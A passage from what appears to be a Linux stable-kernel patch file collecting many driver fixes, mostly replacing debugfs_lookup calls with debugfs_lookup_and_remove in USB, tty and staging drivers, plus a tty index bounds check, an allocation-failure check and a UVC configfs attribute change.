+-	if (!tqspi->soc_data->has_dma || xfer->len > (QSPI_FIFO_DEPTH << 2))
++	if (!tqspi->soc_data->has_dma && xfer->len > (QSPI_FIFO_DEPTH << 2))
+ 		return false;
+ 
+ 	return true;
+diff --git a/drivers/staging/emxx_udc/emxx_udc.c b/drivers/staging/emxx_udc/emxx_udc.c
+index b4e19174bef2e..f9765841c4aa3 100644
+--- a/drivers/staging/emxx_udc/emxx_udc.c
++++ b/drivers/staging/emxx_udc/emxx_udc.c
+@@ -2587,10 +2587,15 @@ static int nbu2ss_ep_queue(struct usb_ep *_ep,
+ 		req->unaligned = false;
+ 
+ 	if (req->unaligned) {
+-		if (!ep->virt_buf)
++		if (!ep->virt_buf) {
+ 			ep->virt_buf = dma_alloc_coherent(udc->dev, PAGE_SIZE,
+ 							  &ep->phys_buf,
+ 							  GFP_ATOMIC | GFP_DMA);
++			if (!ep->virt_buf) {
++				spin_unlock_irqrestore(&udc->lock, flags);
++				return -ENOMEM;
++			}
++		}
+ 		if (ep->epnum > 0)  {
+ 			if (ep->direct == USB_DIR_IN)
+ 				memcpy(ep->virt_buf, req->req.buf,
+diff --git a/drivers/staging/pi433/pi433_if.c b/drivers/staging/pi433/pi433_if.c
+index d4e06a3929f3d..b59f6a4cb611a 100644
+--- a/drivers/staging/pi433/pi433_if.c
++++ b/drivers/staging/pi433/pi433_if.c
+@@ -55,6 +55,7 @@
+ static dev_t pi433_dev;
+ static DEFINE_IDR(pi433_idr);
+ static DEFINE_MUTEX(minor_lock); /* Protect idr accesses */
++static struct dentry *root_dir;	/* debugfs root directory for the driver */
+ 
+ static struct class *pi433_class; /* mainly for udev to create /dev/pi433 */
+ 
+@@ -1306,8 +1307,7 @@ static int pi433_probe(struct spi_device *spi)
+ 	/* spi setup */
+ 	spi_set_drvdata(spi, device);
+ 
+-	entry = debugfs_create_dir(dev_name(device->dev),
+-				   debugfs_lookup(KBUILD_MODNAME, NULL));
++	entry = debugfs_create_dir(dev_name(device->dev), root_dir);
+ 	debugfs_create_file("regs", 0400, entry, device, &pi433_debugfs_regs_fops);
+ 
+ 	return 0;
+@@ -1333,9 +1333,8 @@ RX_failed:
+ static void pi433_remove(struct spi_device *spi)
+ {
+ 	struct pi433_device	*device = spi_get_drvdata(spi);
+-	struct dentry *mod_entry = debugfs_lookup(KBUILD_MODNAME, NULL);
+ 
+-	debugfs_remove(debugfs_lookup(dev_name(device->dev), mod_entry));
++	debugfs_lookup_and_remove(dev_name(device->dev), root_dir);
+ 
+ 	/* free GPIOs */
+ 	free_gpio(device);
+@@ -1408,7 +1407,7 @@ static int __init pi433_init(void)
+ 		return PTR_ERR(pi433_class);
+ 	}
+ 
+-	debugfs_create_dir(KBUILD_MODNAME, NULL);
++	root_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+ 	status = spi_register_driver(&pi433_spi_driver);
+ 	if (status < 0) {
+@@ -1427,7 +1426,7 @@ static void __exit pi433_exit(void)
+ 	spi_unregister_driver(&pi433_spi_driver);
+ 	class_destroy(pi433_class);
+ 	unregister_chrdev(MAJOR(pi433_dev), pi433_spi_driver.driver.name);
+-	debugfs_remove_recursive(debugfs_lookup(KBUILD_MODNAME, NULL));
++	debugfs_remove(root_dir);
+ }
+ module_exit(pi433_exit);
+ 
+diff --git a/drivers/thermal/intel/Kconfig b/drivers/thermal/intel/Kconfig
+index f0c8456792509..e3cfad10d5dd4 100644
+--- a/drivers/thermal/intel/Kconfig
++++ b/drivers/thermal/intel/Kconfig
+@@ -64,7 +64,8 @@ endmenu
+ 
+ config INTEL_BXT_PMIC_THERMAL
+ 	tristate "Intel Broxton PMIC thermal driver"
+-	depends on X86 && INTEL_SOC_PMIC_BXTWC && REGMAP
++	depends on X86 && INTEL_SOC_PMIC_BXTWC
++	select REGMAP
+ 	help
+ 	  Select this driver for Intel Broxton PMIC with ADC channels monitoring
+ 	  system temperature measurements and alerts.
+diff --git a/drivers/thermal/intel/intel_quark_dts_thermal.c b/drivers/thermal/intel/intel_quark_dts_thermal.c
+index 3eafc6b0e6c30..b43fbd5eaa6b4 100644
+--- a/drivers/thermal/intel/intel_quark_dts_thermal.c
++++ b/drivers/thermal/intel/intel_quark_dts_thermal.c
+@@ -415,22 +415,14 @@ MODULE_DEVICE_TABLE(x86cpu, qrk_thermal_ids);
+ 
+ static int __init intel_quark_thermal_init(void)
+ {
+-	int err = 0;
+-
+ 	if (!x86_match_cpu(qrk_thermal_ids) || !iosf_mbi_available())
+ 		return -ENODEV;
+ 
+ 	soc_dts = alloc_soc_dts();
+-	if (IS_ERR(soc_dts)) {
+-		err = PTR_ERR(soc_dts);
+-		goto err_free;
+-	}
++	if (IS_ERR(soc_dts))
++		return PTR_ERR(soc_dts);
+ 
+ 	return 0;
+-
+-err_free:
+-	free_soc_dts(soc_dts);
+-	return err;
+ }
+ 
+ static void __exit intel_quark_thermal_exit(void)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 23910ac724b11..b136c596fe6ae 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1462,12 +1462,32 @@ static void lpuart_break_ctl(struct uart_port *port, int break_state)
+ 
+ static void lpuart32_break_ctl(struct uart_port *port, int break_state)
+ {
+-	unsigned long temp;
++	unsigned long temp, modem;
++	struct tty_struct *tty;
++	unsigned int cflag = 0;
++
++	tty = tty_port_tty_get(&port->state->port);
++	if (tty) {
++		cflag = tty->termios.c_cflag;
++		tty_kref_put(tty);
++	}
+ 
+ 	temp = lpuart32_read(port, UARTCTRL) & ~UARTCTRL_SBK;
++	modem = lpuart32_read(port, UARTMODIR);
+ 
+-	if (break_state != 0)
++	if (break_state != 0) {
+ 		temp |= UARTCTRL_SBK;
++		/*
++		 * LPUART CTS has higher priority than SBK, need to disable CTS before
++		 * asserting SBK to avoid any interference if flow control is enabled.
++		 */
++		if (cflag & CRTSCTS && modem & UARTMODIR_TXCTSE)
++			lpuart32_write(port, modem & ~UARTMODIR_TXCTSE, UARTMODIR);
++	} else {
++		/* Re-enable the CTS when break off. */
++		if (cflag & CRTSCTS && !(modem & UARTMODIR_TXCTSE))
++			lpuart32_write(port, modem | UARTMODIR_TXCTSE, UARTMODIR);
++	}
+ 
+ 	lpuart32_write(port, temp, UARTCTRL);
+ }
+diff --git a/drivers/tty/serial/pch_uart.c b/drivers/tty/serial/pch_uart.c
+index 9576ba8bbc40e..cc83b772b7ca9 100644
+--- a/drivers/tty/serial/pch_uart.c
++++ b/drivers/tty/serial/pch_uart.c
+@@ -1775,7 +1775,7 @@ static void pch_uart_exit_port(struct eg20t_port *priv)
+ 	char name[32];
+ 
+ 	snprintf(name, sizeof(name), "uart%d_regs", priv->port.line);
+-	debugfs_remove(debugfs_lookup(name, NULL));
++	debugfs_lookup_and_remove(name, NULL);
+ 	uart_remove_one_port(&pch_uart_driver, &priv->port);
+ 	free_page((unsigned long)priv->rxbuf.buf);
+ }
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 39f92eb1e6989..29c94be091596 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -1423,25 +1423,6 @@ static int sc16is7xx_probe(struct device *dev,
+ 	}
+ 	sched_set_fifo(s->kworker_task);
+ 
+-#ifdef CONFIG_GPIOLIB
+-	if (devtype->nr_gpio) {
+-		/* Setup GPIO cotroller */
+-		s->gpio.owner		 = THIS_MODULE;
+-		s->gpio.parent		 = dev;
+-		s->gpio.label		 = dev_name(dev);
+-		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
+-		s->gpio.get		 = sc16is7xx_gpio_get;
+-		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
+-		s->gpio.set		 = sc16is7xx_gpio_set;
+-		s->gpio.base		 = -1;
+-		s->gpio.ngpio		 = devtype->nr_gpio;
+-		s->gpio.can_sleep	 = 1;
+-		ret = gpiochip_add_data(&s->gpio, s);
+-		if (ret)
+-			goto out_thread;
+-	}
+-#endif
+-
+ 	/* reset device, purging any pending irq / data */
+ 	regmap_write(s->regmap, SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
+ 			SC16IS7XX_IOCONTROL_SRESET_BIT);
+@@ -1518,6 +1499,25 @@ static int sc16is7xx_probe(struct device *dev,
+ 				s->p[u].irda_mode = true;
+ 	}
+ 
++#ifdef CONFIG_GPIOLIB
++	if (devtype->nr_gpio) {
++		/* Setup GPIO cotroller */
++		s->gpio.owner		 = THIS_MODULE;
++		s->gpio.parent		 = dev;
++		s->gpio.label		 = dev_name(dev);
++		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
++		s->gpio.get		 = sc16is7xx_gpio_get;
++		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
++		s->gpio.set		 = sc16is7xx_gpio_set;
++		s->gpio.base		 = -1;
++		s->gpio.ngpio		 = devtype->nr_gpio;
++		s->gpio.can_sleep	 = 1;
++		ret = gpiochip_add_data(&s->gpio, s);
++		if (ret)
++			goto out_thread;
++	}
++#endif
++
+ 	/*
+ 	 * Setup interrupt. We first try to acquire the IRQ line as level IRQ.
+ 	 * If that succeeds, we can allow sharing the interrupt as well.
+@@ -1537,18 +1537,19 @@ static int sc16is7xx_probe(struct device *dev,
+ 	if (!ret)
+ 		return 0;
+ 
+-out_ports:
+-	for (i--; i >= 0; i--) {
+-		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+-		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
+-	}
+-
+ #ifdef CONFIG_GPIOLIB
+ 	if (devtype->nr_gpio)
+ 		gpiochip_remove(&s->gpio);
+ 
+ out_thread:
+ #endif
++
++out_ports:
++	for (i--; i >= 0; i--) {
++		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
++		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
++	}
++
+ 	kthread_stop(s->kworker_task);
+ 
+ out_clk:
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index 3149114bf130e..36fb945fdad48 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -1224,14 +1224,16 @@ static struct tty_struct *tty_driver_lookup_tty(struct tty_driver *driver,
+ {
+ 	struct tty_struct *tty;
+ 
+-	if (driver->ops->lookup)
++	if (driver->ops->lookup) {
+ 		if (!file)
+ 			tty = ERR_PTR(-EIO);
+ 		else
+ 			tty = driver->ops->lookup(driver, file, idx);
+-	else
++	} else {
++		if (idx >= driver->num)
++			return ERR_PTR(-EINVAL);
+ 		tty = driver->ttys[idx];
+-
++	}
+ 	if (!IS_ERR(tty))
+ 		tty_kref_get(tty);
+ 	return tty;
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index 71e091f879f0e..1dc07f9214d57 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -415,10 +415,8 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		 */
+ 		size = vcs_size(vc, attr, uni_mode);
+ 		if (size < 0) {
+-			if (read)
+-				break;
+ 			ret = size;
+-			goto unlock_out;
++			break;
+ 		}
+ 		if (pos >= size)
+ 			break;
+diff --git a/drivers/usb/chipidea/debug.c b/drivers/usb/chipidea/debug.c
+index faf6b078b6c44..bbc610e5bd69c 100644
+--- a/drivers/usb/chipidea/debug.c
++++ b/drivers/usb/chipidea/debug.c
+@@ -364,5 +364,5 @@ void dbg_create_files(struct ci_hdrc *ci)
+  */
+ void dbg_remove_files(struct ci_hdrc *ci)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(ci->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(ci->dev), usb_debug_root);
+ }
+diff --git a/drivers/usb/common/ulpi.c b/drivers/usb/common/ulpi.c
+index d7c8461976ce0..38703781ee2d1 100644
+--- a/drivers/usb/common/ulpi.c
++++ b/drivers/usb/common/ulpi.c
+@@ -271,7 +271,7 @@ static int ulpi_regs_show(struct seq_file *seq, void *data)
+ }
+ DEFINE_SHOW_ATTRIBUTE(ulpi_regs);
+ 
+-#define ULPI_ROOT debugfs_lookup(KBUILD_MODNAME, NULL)
++static struct dentry *ulpi_root;
+ 
+ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ {
+@@ -301,7 +301,7 @@ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ 		return ret;
+ 	}
+ 
+-	root = debugfs_create_dir(dev_name(dev), ULPI_ROOT);
++	root = debugfs_create_dir(dev_name(dev), ulpi_root);
+ 	debugfs_create_file("regs", 0444, root, ulpi, &ulpi_regs_fops);
+ 
+ 	dev_dbg(&ulpi->dev, "registered ULPI PHY: vendor %04x, product %04x\n",
+@@ -349,8 +349,7 @@ EXPORT_SYMBOL_GPL(ulpi_register_interface);
+  */
+ void ulpi_unregister_interface(struct ulpi *ulpi)
+ {
+-	debugfs_remove_recursive(debugfs_lookup(dev_name(&ulpi->dev),
+-						ULPI_ROOT));
++	debugfs_lookup_and_remove(dev_name(&ulpi->dev), ulpi_root);
+ 	device_unregister(&ulpi->dev);
+ }
+ EXPORT_SYMBOL_GPL(ulpi_unregister_interface);
+@@ -360,12 +359,11 @@ EXPORT_SYMBOL_GPL(ulpi_unregister_interface);
+ static int __init ulpi_init(void)
+ {
+ 	int ret;
+-	struct dentry *root;
+ 
+-	root = debugfs_create_dir(KBUILD_MODNAME, NULL);
++	ulpi_root = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 	ret = bus_register(&ulpi_bus);
+ 	if (ret)
+-		debugfs_remove(root);
++		debugfs_remove(ulpi_root);
+ 	return ret;
+ }
+ subsys_initcall(ulpi_init);
+@@ -373,7 +371,7 @@ subsys_initcall(ulpi_init);
+ static void __exit ulpi_exit(void)
+ {
+ 	bus_unregister(&ulpi_bus);
+-	debugfs_remove_recursive(ULPI_ROOT);
++	debugfs_remove(ulpi_root);
+ }
+ module_exit(ulpi_exit);
+ 
+diff --git a/drivers/usb/core/usb.c b/drivers/usb/core/usb.c
+index 11b15d7b357ad..a415206cab043 100644
+--- a/drivers/usb/core/usb.c
++++ b/drivers/usb/core/usb.c
+@@ -998,7 +998,7 @@ static void usb_debugfs_init(void)
+ 
+ static void usb_debugfs_cleanup(void)
+ {
+-	debugfs_remove(debugfs_lookup("devices", usb_debug_root));
++	debugfs_lookup_and_remove("devices", usb_debug_root);
+ }
+ 
+ /*
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 8f9959ba9fd46..582ebd9cf9c2e 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -1117,6 +1117,7 @@ struct dwc3_scratchpad_array {
+  *		     address.
+  * @num_ep_resized: carries the current number endpoints which have had its tx
+  *		    fifo resized.
++ * @debug_root: root debugfs directory for this device to put its files in.
+  */
+ struct dwc3 {
+ 	struct work_struct	drd_work;
+@@ -1332,6 +1333,7 @@ struct dwc3 {
+ 	int			max_cfg_eps;
+ 	int			last_fifo_depth;
+ 	int			num_ep_resized;
++	struct dentry		*debug_root;
+ };
+ 
+ #define INCRX_BURST_MODE 0
+diff --git a/drivers/usb/dwc3/debug.h b/drivers/usb/dwc3/debug.h
+index 48b44b88dc252..8bb2c9e3b9ac6 100644
+--- a/drivers/usb/dwc3/debug.h
++++ b/drivers/usb/dwc3/debug.h
+@@ -414,11 +414,14 @@ static inline const char *dwc3_gadget_generic_cmd_status_string(int status)
+ 
+ #ifdef CONFIG_DEBUG_FS
+ extern void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep);
++extern void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep);
+ extern void dwc3_debugfs_init(struct dwc3 *d);
+ extern void dwc3_debugfs_exit(struct dwc3 *d);
+ #else
+ static inline void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
+ {  }
++static inline void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep)
++{  }
+ static inline void dwc3_debugfs_init(struct dwc3 *d)
+ {  }
+ static inline void dwc3_debugfs_exit(struct dwc3 *d)
+diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
+index f2b7675c7f621..850df0e6bcabf 100644
+--- a/drivers/usb/dwc3/debugfs.c
++++ b/drivers/usb/dwc3/debugfs.c
+@@ -873,27 +873,23 @@ static const struct dwc3_ep_file_map dwc3_ep_file_map[] = {
+ 	{ "GDBGEPINFO", &dwc3_ep_info_register_fops, },
+ };
+ 
+-static void dwc3_debugfs_create_endpoint_files(struct dwc3_ep *dep,
+-		struct dentry *parent)
++void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
+ {
++	struct dentry		*dir;
+ 	int			i;
+ 
++	dir = debugfs_create_dir(dep->name, dep->dwc->debug_root);
+ 	for (i = 0; i < ARRAY_SIZE(dwc3_ep_file_map); i++) {
+ 		const struct file_operations *fops = dwc3_ep_file_map[i].fops;
+ 		const char *name = dwc3_ep_file_map[i].name;
+ 
+-		debugfs_create_file(name, 0444, parent, dep, fops);
++		debugfs_create_file(name, 0444, dir, dep, fops);
+ 	}
+ }
+ 
+-void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
++void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep)
+ {
+-	struct dentry		*dir;
+-	struct dentry		*root;
+-
+-	root = debugfs_lookup(dev_name(dep->dwc->dev), usb_debug_root);
+-	dir = debugfs_create_dir(dep->name, root);
+-	dwc3_debugfs_create_endpoint_files(dep, dir);
++	debugfs_lookup_and_remove(dep->name, dep->dwc->debug_root);
+ }
+ 
+ void dwc3_debugfs_init(struct dwc3 *dwc)
+@@ -911,6 +907,7 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 	dwc->regset->base = dwc->regs - DWC3_GLOBALS_REGS_START;
+ 
+ 	root = debugfs_create_dir(dev_name(dwc->dev), usb_debug_root);
++	dwc->debug_root = root;
+ 	debugfs_create_regset32("regdump", 0444, root, dwc->regset);
+ 	debugfs_create_file("lsp_dump", 0644, root, dwc, &dwc3_lsp_fops);
+ 
+@@ -929,6 +926,6 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 
+ void dwc3_debugfs_exit(struct dwc3 *dwc)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(dwc->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(dwc->dev), usb_debug_root);
+ 	kfree(dwc->regset);
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 89dcfac01235f..3c63fa97a6800 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -3194,9 +3194,7 @@ static void dwc3_gadget_free_endpoints(struct dwc3 *dwc)
+ 			list_del(&dep->endpoint.ep_list);
+ 		}
+ 
+-		debugfs_remove_recursive(debugfs_lookup(dep->name,
+-				debugfs_lookup(dev_name(dep->dwc->dev),
+-					       usb_debug_root)));
++		dwc3_debugfs_remove_endpoint_dir(dep);
+ 		kfree(dep);
+ 	}
+ }
+diff --git a/drivers/usb/fotg210/fotg210-core.c b/drivers/usb/fotg210/fotg210-core.c
+index ee740a6da463f..da9ea5957ccff 100644
+--- a/drivers/usb/fotg210/fotg210-core.c
++++ b/drivers/usb/fotg210/fotg210-core.c
+@@ -127,7 +127,9 @@ static int fotg210_remove(struct platform_device *pdev)
+ 
+ #ifdef CONFIG_OF
+ static const struct of_device_id fotg210_of_match[] = {
++	{ .compatible = "faraday,fotg200" },
+ 	{ .compatible = "faraday,fotg210" },
++	/* TODO: can we also handle FUSB220? */
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, fotg210_of_match);
+diff --git a/drivers/usb/fotg210/fotg210-hcd.c b/drivers/usb/fotg210/fotg210-hcd.c
+index 51ac93a2eb98e..1c5eb8f8c19c6 100644
+--- a/drivers/usb/fotg210/fotg210-hcd.c
++++ b/drivers/usb/fotg210/fotg210-hcd.c
+@@ -862,7 +862,7 @@ static inline void remove_debug_files(struct fotg210_hcd *fotg210)
+ {
+ 	struct usb_bus *bus = &fotg210_to_hcd(fotg210)->self;
+ 
+-	debugfs_remove(debugfs_lookup(bus->bus_name, fotg210_debug_root));
++	debugfs_lookup_and_remove(bus->bus_name, fotg210_debug_root);
+ }
+ 
+ /* handshake - spin reading hc until handshake completes or fails
+diff --git a/drivers/usb/gadget/function/uvc_configfs.c b/drivers/usb/gadget/function/uvc_configfs.c
+index 76cb60d13049f..1460142fbc429 100644
+--- a/drivers/usb/gadget/function/uvc_configfs.c
++++ b/drivers/usb/gadget/function/uvc_configfs.c
+@@ -483,11 +483,68 @@ UVC_ATTR_RO(uvcg_default_output_, cname, aname)
+ UVCG_DEFAULT_OUTPUT_ATTR(b_terminal_id, bTerminalID, 8);
+ UVCG_DEFAULT_OUTPUT_ATTR(w_terminal_type, wTerminalType, 16);
+ UVCG_DEFAULT_OUTPUT_ATTR(b_assoc_terminal, bAssocTerminal, 8);
+-UVCG_DEFAULT_OUTPUT_ATTR(b_source_id, bSourceID, 8);
+ UVCG_DEFAULT_OUTPUT_ATTR(i_terminal, iTerminal, 8);
+ 
+ #undef UVCG_DEFAULT_OUTPUT_ATTR
+ 
++static ssize_t uvcg_default_output_b_source_id_show(struct config_item *item,
++						    char *page)
++{
++	struct config_group *group = to_config_group(item);
++	struct f_uvc_opts *opts;
++	struct config_item *opts_item;
++	struct mutex *su_mutex = &group->cg_subsys->su_mutex;
++	struct uvc_output_terminal_descriptor *cd;
++	int result;
++
++	mutex_lock(su_mutex); /* for navigating configfs hierarchy */
++
++	opts_item = group->cg_item.ci_parent->ci_parent->
++			ci_parent->ci_parent;
++	opts = to_f_uvc_opts(opts_item);
++	cd = &opts->uvc_output_terminal;
++
++	mutex_lock(&opts->lock);
++	result = sprintf(page, "%u\n", le8_to_cpu(cd->bSourceID));
++	mutex_unlock(&opts->lock);
++
++	mutex_unlock(su_mutex);
++
++	return result;
++}
++
++static ssize_t uvcg_default_output_b_source_id_store(struct config_item *item,
++						     const char *page, size_t len)
++{
++	struct config_group *group = to_config_group(item);
++	struct f_uvc_opts *opts;
++	struct config_item *opts_item;
++	struct mutex *su_mutex = &group->cg_subsys->su_mutex;
++	struct uvc_output_terminal_descriptor *cd;
++	int result;
++	u8 num;
++
++	result = kstrtou8(page, 0, &num);
++	if (result)
++		return result;
++
++	mutex_lock(su_mutex); /* for navigating configfs hierarchy */
++
++	opts_item = group->cg_item.ci_parent->ci_parent->
++			ci_parent->ci_parent;
++	opts = to_f_uvc_opts(opts_item);
++	cd = &opts->uvc_output_terminal;
++
++	mutex_lock(&opts->lock);
++	cd->bSourceID = num;
++	mutex_unlock(&opts->lock);
++
++	mutex_unlock(su_mutex);
++
++	return len;
++}
++UVC_ATTR(uvcg_default_output_, b_source_id, bSourceID);
++
+ static struct configfs_attribute *uvcg_default_output_attrs[] = {
+ 	&uvcg_default_output_attr_b_terminal_id,
+ 	&uvcg_default_output_attr_w_terminal_type,
+diff --git a/drivers/usb/gadget/udc/bcm63xx_udc.c b/drivers/usb/gadget/udc/bcm63xx_udc.c
+index d04d72f5816e6..8d58928913007 100644
+--- a/drivers/usb/gadget/udc/bcm63xx_udc.c
++++ b/drivers/usb/gadget/udc/bcm63xx_udc.c
+@@ -2258,7 +2258,7 @@ static void bcm63xx_udc_init_debugfs(struct bcm63xx_udc *udc)
+  */
+ static void bcm63xx_udc_cleanup_debugfs(struct bcm63xx_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(udc->gadget.name, usb_debug_root));
++	debugfs_lookup_and_remove(udc->gadget.name, usb_debug_root);
+ }
+ 
+ /***********************************************************************
+diff --git a/drivers/usb/gadget/udc/gr_udc.c b/drivers/usb/gadget/udc/gr_udc.c
+index 85cdc0af3bf95..09762559912d3 100644
+--- a/drivers/usb/gadget/udc/gr_udc.c
++++ b/drivers/usb/gadget/udc/gr_udc.c
+@@ -215,7 +215,7 @@ static void gr_dfs_create(struct gr_udc *dev)
+ 
+ static void gr_dfs_delete(struct gr_udc *dev)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(dev->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(dev->dev), usb_debug_root);
+ }
+ 
+ #else /* !CONFIG_USB_GADGET_DEBUG_FS */
+diff --git a/drivers/usb/gadget/udc/lpc32xx_udc.c b/drivers/usb/gadget/udc/lpc32xx_udc.c
+index cea10cdb83ae5..fe62db32dd0eb 100644
+--- a/drivers/usb/gadget/udc/lpc32xx_udc.c
++++ b/drivers/usb/gadget/udc/lpc32xx_udc.c
+@@ -532,7 +532,7 @@ static void create_debug_file(struct lpc32xx_udc *udc)
+ 
+ static void remove_debug_file(struct lpc32xx_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(debug_filename, NULL));
++	debugfs_lookup_and_remove(debug_filename, NULL);
+ }
+ 
+ #else
+diff --git a/drivers/usb/gadget/udc/pxa25x_udc.c b/drivers/usb/gadget/udc/pxa25x_udc.c
+index c593fc383481e..9e01ddf2b4170 100644
+--- a/drivers/usb/gadget/udc/pxa25x_udc.c
++++ b/drivers/usb/gadget/udc/pxa25x_udc.c
+@@ -1340,7 +1340,7 @@ DEFINE_SHOW_ATTRIBUTE(udc_debug);
+ 		debugfs_create_file(dev->gadget.name, \
+ 			S_IRUGO, NULL, dev, &udc_debug_fops); \
+ 	} while (0)
+-#define remove_debug_files(dev) debugfs_remove(debugfs_lookup(dev->gadget.name, NULL))
++#define remove_debug_files(dev) debugfs_lookup_and_remove(dev->gadget.name, NULL)
+ 
+ #else	/* !CONFIG_USB_GADGET_DEBUG_FILES */
+ 
+diff --git a/drivers/usb/gadget/udc/pxa27x_udc.c b/drivers/usb/gadget/udc/pxa27x_udc.c
+index ac980d6a47406..0ecdfd2ba9e9b 100644
+--- a/drivers/usb/gadget/udc/pxa27x_udc.c
++++ b/drivers/usb/gadget/udc/pxa27x_udc.c
+@@ -215,7 +215,7 @@ static void pxa_init_debugfs(struct pxa_udc *udc)
+ 
+ static void pxa_cleanup_debugfs(struct pxa_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(udc->gadget.name, usb_debug_root));
++	debugfs_lookup_and_remove(udc->gadget.name, usb_debug_root);
+ }
+ 
+ #else
+diff --git a/drivers/usb/host/isp116x-hcd.c b/drivers/usb/host/isp116x-hcd.c
+index 4f564d71bb0bc..49ae01487af4d 100644
+--- a/drivers/usb/host/isp116x-hcd.c
++++ b/drivers/usb/host/isp116x-hcd.c
+@@ -1205,7 +1205,7 @@ static void create_debug_file(struct isp116x *isp116x)
+ 
+ static void remove_debug_file(struct isp116x *isp116x)
+ {
+-	debugfs_remove(debugfs_lookup(hcd_name, usb_debug_root));
++	debugfs_lookup_and_remove(hcd_name, usb_debug_root);
+ }
+ 
+ #else
+diff --git a/drivers/usb/host/isp1362-hcd.c b/drivers/usb/host/isp1362-hcd.c
+index 0e14d1d07709d..b0da143ef4be9 100644
+--- a/drivers/usb/host/isp1362-hcd.c
++++ b/drivers/usb/host/isp1362-hcd.c
+@@ -2170,7 +2170,7 @@ static void create_debug_file(struct isp1362_hcd *isp1362_hcd)
+ 
+ static void remove_debug_file(struct isp1362_hcd *isp1362_hcd)
+ {
+-	debugfs_remove(debugfs_lookup("isp1362", usb_debug_root));
++	debugfs_lookup_and_remove("isp1362", usb_debug_root);
+ }
+ 
+ /*-------------------------------------------------------------------------*/
+diff --git a/drivers/usb/host/sl811-hcd.c b/drivers/usb/host/sl811-hcd.c
+index d206bd95c7bbc..b8b90eec91078 100644
+--- a/drivers/usb/host/sl811-hcd.c
++++ b/drivers/usb/host/sl811-hcd.c
+@@ -1501,7 +1501,7 @@ static void create_debug_file(struct sl811 *sl811)
+ 
+ static void remove_debug_file(struct sl811 *sl811)
+ {
+-	debugfs_remove(debugfs_lookup("sl811h", usb_debug_root));
++	debugfs_lookup_and_remove("sl811h", usb_debug_root);
+ }
+ 
+ /*-------------------------------------------------------------------------*/
+diff --git a/drivers/usb/host/uhci-hcd.c b/drivers/usb/host/uhci-hcd.c
+index c22b51af83fcb..7cdc2fa7c28fb 100644
+--- a/drivers/usb/host/uhci-hcd.c
++++ b/drivers/usb/host/uhci-hcd.c
+@@ -536,8 +536,8 @@ static void release_uhci(struct uhci_hcd *uhci)
+ 	uhci->is_initialized = 0;
+ 	spin_unlock_irq(&uhci->lock);
+ 
+-	debugfs_remove(debugfs_lookup(uhci_to_hcd(uhci)->self.bus_name,
+-				      uhci_debugfs_root));
++	debugfs_lookup_and_remove(uhci_to_hcd(uhci)->self.bus_name,
++				  uhci_debugfs_root);
+ 
+ 	for (i = 0; i < UHCI_NUM_SKELQH; i++)
+ 		uhci_free_qh(uhci, uhci->skelqh[i]);
+@@ -700,7 +700,7 @@ err_alloc_frame_cpu:
+ 			uhci->frame, uhci->frame_dma_handle);
+ 
+ err_alloc_frame:
+-	debugfs_remove(debugfs_lookup(hcd->self.bus_name, uhci_debugfs_root));
++	debugfs_lookup_and_remove(hcd->self.bus_name, uhci_debugfs_root);
+ 
+ 	return retval;
+ }
+diff --git a/drivers/usb/host/xhci-mvebu.c b/drivers/usb/host/xhci-mvebu.c
+index 60651a50770f9..87f1597a0e5ab 100644
+--- a/drivers/usb/host/xhci-mvebu.c
++++ b/drivers/usb/host/xhci-mvebu.c
+@@ -32,7 +32,7 @@ static void xhci_mvebu_mbus_config(void __iomem *base,
+ 
+ 	/* Program each DRAM CS in a seperate window */
